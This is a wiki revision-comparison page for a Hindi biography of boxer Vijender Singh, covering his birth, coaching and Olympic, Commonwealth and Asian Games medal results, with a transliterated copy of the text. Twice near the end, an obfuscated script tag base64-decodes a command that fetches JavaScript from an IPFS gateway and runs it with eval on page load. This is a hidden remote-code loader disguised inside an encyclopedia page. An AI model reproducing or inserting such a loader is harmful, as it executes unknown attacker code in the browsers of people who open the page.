Difference between revisions of "विजेन्द्र सिंह"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
 
[[चित्र:Vijender-Singh.jpg|thumb|250px|विजेन्द्र कुमार सिंह<br />Vijender Kumar Singh]]  
 
[[चित्र:Vijender-Singh.jpg|thumb|250px|विजेन्द्र कुमार सिंह<br />Vijender Kumar Singh]]  
 
*विजेन्द्र एक सुप्रसिद्ध मुक्केबाज़ खिलाड़ी है।
 
*विजेन्द्र एक सुप्रसिद्ध मुक्केबाज़ खिलाड़ी है।
*विजेन्द्र का [[29 अक्टूबर]], [[1983]] को [[कलुवास]] (भिवानी ज़िला) गाँव, [[हरियाणा]] में हुआ था।  
+
*विजेन्द्र का जन्म [[29 अक्टूबर]], [[1983]] को [[कलुवास]] (भिवानी ज़िला) गाँव, [[हरियाणा]] में हुआ था।  
 
*विजेन्द्र ने मुक्केबाज़ी की शुरूआत बचपन में भिवानी बॉक्सिंग क्लब से कोच जगदीश सिंह की देख-रेख में की।  
 
*विजेन्द्र ने मुक्केबाज़ी की शुरूआत बचपन में भिवानी बॉक्सिंग क्लब से कोच जगदीश सिंह की देख-रेख में की।  
 
==मुक्केबाज़ी में पराजित==
 
==मुक्केबाज़ी में पराजित==
 
{{tocright}}
 
{{tocright}}
विजेन्द्र कुमार ने [[22 अगस्त]], [[2008]] को बीजिंग ओलम्पिक में मुक्केबाज़ी के सेमीफ़ाइनल के मिडिल वेट में क्यूबा के अमीलो कोररिया से 5-8 पराजित होने के बाद भारतीय ओलम्पिक के इतिहास में मुक्केबाज़ी की किसी स्पर्धा में कांस्य पदक जीतने वाले प्रथम भारतीय मुक्केबाज़ बन गये।
+
विजेन्द्र कुमार ने [[22 अगस्त]], [[2008]] को बीजिंग ओलम्पिक में मुक्केबाज़ी के सेमीफ़ाइनल के मिडिल वेट में क्यूबा के अमीलो कोररिया से 5-8 बार पराजित होने के बाद भारतीय ओलम्पिक के इतिहास में मुक्केबाज़ी की स्पर्धा में कांस्य पदक जीतने वाले प्रथम भारतीय मुक्केबाज़ बन गये।
विजेन्द्र कुमार ने बीजिंग ओलम्पिक में मुक्केबाज़ी के प्रथम चरण में गाम्बिया के बडोऊ ज़ैक को 13-2 से पराजित किया। दूसरे चरण में थाइलैंण्ड के अंगकान चोमफुहफुआंग को 13-3 से पराजित कर क्वार्टर फ़ाइनल में प्रवेश किया। क्वार्टर फ़ाइनल में इक्वाडोर के कारलोस गोजगोरा को 9-4 से पराजित कर सेमीफ़ाइनल में पहुँच काँस्य पदक पक्का कर लिया था।
+
विजेन्द्र कुमार ने बीजिंग ओलम्पिक में मुक्केबाज़ी के प्रथम चरण में गाम्बिया के बडोऊ ज़ैक को 13-2 से पराजित किया। दूसरे चरण में थाइलैंण्ड के अंगकान चोमफुहफुआंग को 13-3 से पराजित कर क्वार्टर फ़ाइनल में प्रवेश किया। क्वार्टर फ़ाइनल में इक्वाडोर के कारलोस गोजगोरा को 9-4 से पराजित कर सेमीफ़ाइनल में पहुँच कांस्य पदक पक्का कर लिया था।
 
==खेल उपलब्धियाँ==
 
==खेल उपलब्धियाँ==
 
*जगदीश सिंह को वर्ष [[2008]] में [[भारत]] के सर्वोच्च खेल प्रशिक्षक पुरस्कार द्रोणाचार्य अवार्ड से भी सम्मानित किया गया है।
 
*जगदीश सिंह को वर्ष [[2008]] में [[भारत]] के सर्वोच्च खेल प्रशिक्षक पुरस्कार द्रोणाचार्य अवार्ड से भी सम्मानित किया गया है।
 
*विजेन्द्र ने वर्ष [[2004]] के एथेंस ओलम्पिक में सर्वप्रथम भाग लिया, किन्तु वह वेल्टर वेट वर्ग में तुर्की के मुस्तफ़ा कारागोलेयू से 20-25 से पराजित हो गये।
 
*विजेन्द्र ने वर्ष [[2004]] के एथेंस ओलम्पिक में सर्वप्रथम भाग लिया, किन्तु वह वेल्टर वेट वर्ग में तुर्की के मुस्तफ़ा कारागोलेयू से 20-25 से पराजित हो गये।
*राष्ट्रमण्डल खेल वर्ष [[2006]] में इंग्लैंण्ड के नील पिरकिन्स को सेमीफ़ाइनल में पराजित कर फ़ाइनल में प्रवेश किया, किन्तु दक्षिण अफ़्रीका के बोनगानी मविलासी से पराजित हो गए और काँस्य पदक ही जीत सके।  
+
*राष्ट्रमण्डल खेल वर्ष [[2006]] में इंग्लैंण्ड के नील पिरकिन्स को सेमीफ़ाइनल में पराजित कर फ़ाइनल में प्रवेश किया, किन्तु दक्षिण अफ़्रीका के बोनगानी मविलासी से पराजित हो गए और कांस्य पदक ही जीत सके।  
*दोहा ओलम्पिक खेल वर्ष 2006 में मुक्केबाज़ी मिडिल वेट वर्ग में क़जाकिस्तान के बख़्तियार अरतायेव से सेमीफ़ाइनल में 24-29 से पराजित होकर काँस्य पदक जीत सके।
+
*दोहा ओलम्पिक खेल वर्ष 2006 में मुक्केबाज़ी मिडिल वेट वर्ग में क़जाकिस्तान के बख़्तियार अरतायेव से सेमीफ़ाइनल में 24-29 से पराजित होकर कांस्य पदक जीत सके।
  
 
{{प्रचार}}
 
{{प्रचार}}

Revision as of 07:36, 11 April 2011

thumb|250px|vijendr kumar sianh
Vijender Kumar Singh

  • vijendr ek suprasiddh mukkebaz khila di hai.
  • vijendr ka janm 29 aktoobar, 1983 ko kaluvas (bhivani zila) gaanv, hariyana mean hua tha.
  • vijendr ne mukkebazi ki shurooat bachapan mean bhivani b aauksiang klab se koch jagadish sianh ki dekh-rekh mean ki.

mukkebazi mean parajit

vijendr kumar ne 22 agast, 2008 ko bijiang olampik mean mukkebazi ke semifainal ke midil vet mean kyooba ke amilo korariya se 5-8 bar parajit hone ke bad bharatiy olampik ke itihas mean mukkebazi ki spardha mean kaansy padak jitane vale pratham bharatiy mukkebaz ban gaye. vijendr kumar ne bijiang olampik mean mukkebazi ke pratham charan mean gambiya ke badooo zaik ko 13-2 se parajit kiya. doosare charan mean thailaiannd ke aangakan chomaphuhaphuaang ko 13-3 se parajit kar kvartar fainal mean pravesh kiya. kvartar fainal mean ikvador ke karalos gojagora ko 9-4 se parajit kar semifainal mean pahuanch kaansy padak pakka kar liya tha.

khel upalabdhiyaan

  • jagadish sianh ko varsh 2008 mean bharat ke sarvochch khel prashikshak puraskar dronachary avard se bhi sammanit kiya gaya hai.
  • vijendr ne varsh 2004 ke etheans olampik mean sarvapratham bhag liya, kintu vah veltar vet varg mean turki ke mustafa karagoleyoo se 20-25 se parajit ho gaye.
  • rashtramandal khel varsh 2006 mean ianglaiannd ke nil pirakins ko semifainal mean parajit kar fainal mean pravesh kiya, kintu dakshin afrika ke bonagani mavilasi se parajit ho ge aur kaansy padak hi jit sake.
  • doha olampik khel varsh 2006 mean mukkebazi midil vet varg mean qajakistan ke bakhtiyar aratayev se semifainal mean 24-29 se parajit hokar kaansy padak jit sake.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>